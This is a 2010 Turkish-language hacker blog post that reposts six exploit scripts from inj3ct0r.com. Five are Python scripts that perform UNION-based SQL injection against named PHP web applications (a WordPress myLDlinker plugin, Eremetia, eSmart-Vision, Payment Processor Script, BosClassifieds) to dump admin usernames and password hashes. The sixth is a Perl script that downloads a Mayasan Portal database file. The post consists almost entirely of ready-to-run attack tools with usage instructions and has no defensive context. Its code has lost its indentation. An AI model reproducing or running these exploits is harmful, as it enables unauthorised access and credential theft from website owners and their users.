"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

python ile exploit yazma etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
python ile exploit yazma etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

2 Ağustos 2010 Pazartesi

exploitler ile ilgili

şimdi bu blogspot kafasına göre güvenlik uygulaması yapıyor ya :D dolayısıyla exploitleri tam yayınlayamıyorum yani kodlar eksik olabilir benim blogda. dolayısıyla verdiğim orjinal linklerden kullanın ;) blogspottan sıkılmaya başladım bakalım çözüm nolcak :S

WordPress Plugin myLDlinker (myLDlinker.php) SQL Injection Exploit (.py)

http://inj3ct0r.com/exploits/13553



========================================================================
WordPress Plugin myLDlinker (myLDlinker.php) SQL Injection Exploit (.py)
========================================================================


#!/usr/bin/env python
#-*- coding:utf-8 -*-

# WordPress Plugin myLDlinker (myLDlinker.php url) SQL Injection Exploit (.py)
# Author ZoRLu
# Exploit Coded By ZoRLu / Date: 02/08/2010
# Found H-SK33PY / Date: 22/07/2010
# Orijinal Link http://inj3ct0r.com/exploits/13438
# Tested on my vista proof: http://img196.imageshack.us/img196/5655/wordvm.jpg
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " WordPress Plugin myLDlinker SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"

sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "myLDlinker.php"
sql = "?url=00000000+union+select+1,concat(0x3e3e3e,user_login,0x3a3a,user_pass,0x3a3a),3,4,5,6,7,8+from+wp_users--"
url = sitemiz + vulnfile + sql

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r">>>(.*)([0-9a-fA-F])(.*)", veri)
if len(aliver) > 0:
print "user::hash:: " + aliver[0][0]

print "\nGood Job Bro!"
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"


# Inj3ct0r.com [2010-08-02]

Eremetia (news.php & faq2.php id) SQL Injection Exploit (.py)

http://inj3ct0r.com/exploits/13552



=============================================================
Eremetia (news.php & faq2.php id) SQL Injection Exploit (.py)
=============================================================


#!/usr/bin/env python
#-*- coding:cp1254 -*-

# Eremetia (news.php & faq2.php id) SQL Injection Exploit (.py)
# Author ZoRLu
# Exploit Coded By ZoRLu / Date: 02/08/2010
# Found The_Exploited / Date: 29/04/2010
# Orijinal Link http://inj3ct0r.com/exploits/12059
# Tested on my vista proof: http://img251.imageshack.us/img251/4673/eremetia.jpg
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Eremetia (id) SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"

sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "news.php"
sql = "?id=000000000+union+select+1,2,concat(0x3a3a3a,login,0x3a3a,senha,0x3a3a3a),4,5+from+admin"
url = sitemiz + vulnfile + sql

vulnfile2 = "faq2.php"
sql2 = "?id=000000000+union+select+1,2,concat(0x3a3a3a,login,0x3a3a,senha,0x3a3a3a),4+from+admin"
url2 = sitemiz + vulnfile2 + sql2

print "\nvulnfile:"+vulnfile
print "column_number: 5"
print "sql: "+sql

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "login::password: " + aliver[0][0]+ aliver[0][1]

print "\n" + vulnfile + " ok!"
print "wait for other file"
time.sleep(2)
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"

print "\nvulnfile:"+vulnfile2
print "column_number: 4"
print "sql: "+sql2

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url2).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "login::password: " + aliver[0][0]+ aliver[0][1]

print "\nGood Job Bro!"
print "we searched for " + vulnfile + " and " + vulnfile2
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"


# Inj3ct0r.com [2010-08-02]

eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)

http://inj3ct0r.com/exploits/13549



====================================================================
eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)
====================================================================

#!/usr/bin/env python
#-*- coding:utf-8 -*-

# eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)
# Found & Coded By ZoRLu
# Tested on my vista proof: http://img251.imageshack.us/img251/7747/esmart.jpg
# Date: 01/08/2010
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " eSmart-Vision Trading SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"

sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "g_details.php"
sql = "?id=0000000+union+select+1,2,3,4,concat(0x3e3e3e,email,0x3a3a,password,0x3e3e3e),6,7+from+userinfo--"
url = sitemiz + vulnfile + sql

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r">>>(.*)([0-9a-fA-F])(.*)>>>", veri)
if len(aliver) > 0:
print "email::password: " + aliver[0][0]

print "\nGood Job Bro!"
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"



# Inj3ct0r.com [2010-08-02]

Payment Processor Script (faq.htm farea) SQL Injection Exploit (.py)

http://inj3ct0r.com/exploits/13546



====================================================================
Payment Processor Script (faq.htm farea) SQL Injection Exploit (.py)
====================================================================


#!/usr/bin/env python
#-*- coding:utf-8 -*-

# Payment Processor Script (faq.htm farea) SQL Injection Exploit (.py)
# Found & Coded By ZoRLu
# Tested on my vista proof: http://img838.imageshack.us/img838/4229/proces.jpg
# Date: 01/08/2010
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Payment Processor Script SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

sitemiz = sys.argv[1]
if sitemiz[-1:] != "/":
sitemiz += "/"

vulnfile = "faq.htm"
sql = "?farea=4+union+select+1,concat(0x3a3a3a,username,0x3a3a3a,password,0x3a3a3a),3+from+dp_members"
login = "members/login.htm"
url = sitemiz + vulnfile + sql
url2 = sitemiz + login

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "username:::password: " + aliver[0][0]

print "\nGood Job Bro!"
print "you will be login"
print "Login: " + url2
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"


# Inj3ct0r.com [2010-08-01]

BosDev BosClassifieds (cat_id) SQL Injection Exploit (.py)

http://inj3ct0r.com/exploits/13531



==========================================================
BosDev BosClassifieds (cat_id) SQL Injection Exploit (.py)
==========================================================


#!/usr/bin/env python
#-*- coding:utf-8 -*-
# BosDev BosClassifieds (cat_id) SQL Injection Exploit (.py)
# Found & Coded By ZoRLu
# Tested on my vista proof: http://img24.imageshack.us/img24/2729/bosdev.jpg
# Date: 31/07/2010
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " BosDev BosClassifieds SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

sitemiz = sys.argv[1]
if sitemiz[-1:] != "/":
sitemiz += "/"

url = sitemiz + "index.php?cat_id=-9999+union+select+concat(0x3a3a3a,username,password,0x3a3a3a)+from+bosdevUUS--"

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F]{32})(.*)", veri)
if len(aliver) > 0:
print "Username: " + aliver[0][0]
print "Password: " + aliver[0][1]
print "\nGood Job Bro!"
else:
print "Exploit failed..."

except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"



# Inj3ct0r.com [2010-08-01]

Mayasan Portal V 1.0 / V 2.0 Database Disclosure Exploit (.pl)

http://inj3ct0r.com/exploits/13524


========================================================
MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
========================================================


#!/usr/bin/perl -w
#
# MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
#
# Found & Coded: ZoRLu
#
# Tested on my vista proof: http://img37.imageshack.us/img37/3531/testcz.jpg
#
# Date: 25/07/2010
#
# Home: z0rlu.blogspot.com
#
# Thanks: Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
#
# Download : http://mportal.somee.com/indir/v20/v20/v20.zip



use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit');
system('color 4');


if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit *\n";
print "\* Exploited By : ZoRLu *\n";
print "\* msn : admin[at]yildirimordulari.com *\n";
print "\* Home : http://z0rlu.blogspot.com *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="db/mayasanportal.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}


# Inj3ct0r.com [2010-07-30]
 
Dizi